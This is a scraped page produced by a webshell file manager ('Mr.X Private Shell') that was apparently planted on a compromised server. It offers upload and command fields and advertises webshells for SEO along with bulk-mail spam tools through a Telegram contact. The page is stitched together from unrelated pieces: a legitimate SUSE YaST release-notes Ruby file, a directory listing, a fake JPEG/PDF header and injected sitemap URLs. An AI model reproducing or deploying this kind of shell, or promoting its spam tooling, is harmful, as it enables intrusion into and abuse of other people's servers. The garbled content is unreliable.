xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
# encoding: utf-8

# File:	installation/include/load_release_notes.ycp
# Module:	Installation
# Summary:	Load release notes from media
# Authors:	Arvin Schnell <arvin@suse.de>
#              Jiri Srain <jsrain@suse.cz>
#
# Load release notes from media
#
# $Id: release_notes_popup.ycp 34411 2006-11-15 13:45:11Z locilka $
module Yast
  module PackagerLoadReleaseNotesInclude
    def initialize_packager_load_release_notes(include_target)
      Yast.import "Pkg"
      textdomain "packager"

      Yast.import "Language"
      Yast.import "Report"
      Yast.import "Stage"

      # release notes
      @media_text = ""
    end

    # FIXME get rid of similar funciton in instlalation/clients/release_notes_popup.ycp

    # function to load release notes
    def load_release_notes(source_id)
      if source_id == nil || Ops.less_than(source_id, 0)
        Builtins.y2error("Source_id: %1", source_id)
        return false
      end

      path_to_relnotes = "/docu"
      filename_templ = UI.TextMode ? "/RELEASE-NOTES.%1.txt" : "/RELEASE-NOTES.%1.rtf"

      path_templ = path_to_relnotes + filename_templ
      Builtins.y2debug("Path template: %1", path_templ)

      # try 'en_UK' for 'en_UK'
      tmp = Builtins.sformat(path_templ, Language.language)
      Builtins.y2debug("Trying to get %1", tmp)
      tmp = Pkg.SourceProvideDigestedFile(
        source_id, # optional
        1,
        tmp,
        true
      )

      # try 'es' for 'es_ES'
      if tmp == nil
        tmp = Builtins.sformat(
          path_templ,
          Builtins.substring(Language.language, 0, 2)
        )
        Builtins.y2debug("Trying to get %1", tmp)
        tmp = Pkg.SourceProvideDigestedFile(
          source_id, # optional
          1,
          tmp,
          true
        )
      end

      # try 'en'
      if tmp == nil
        tmp = Builtins.sformat(path_templ, "en")
        Builtins.y2debug("Trying to get %1", tmp)
        tmp = Pkg.SourceProvideDigestedFile(
          source_id, # optional
          1,
          tmp,
          true
        )
      end

      # no other fallback
      return false if tmp == nil

      # read the release notes content
      @media_text = Convert.to_string(
        SCR.Read(path(".target.string"), [tmp, ""])
      )
      return true if @media_text != "" && @media_text != nil

      false
    end
  end
end

Filemanager

Name Type Size Permission Actions
inst_source_dialogs.rb File 812 B 0644
key_manager_dialogs.rb File 10.62 KB 0644
load_release_notes.rb File 2.29 KB 0644
repositories_include.rb File 15.2 KB 0644
storage_include.rb File 1.22 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml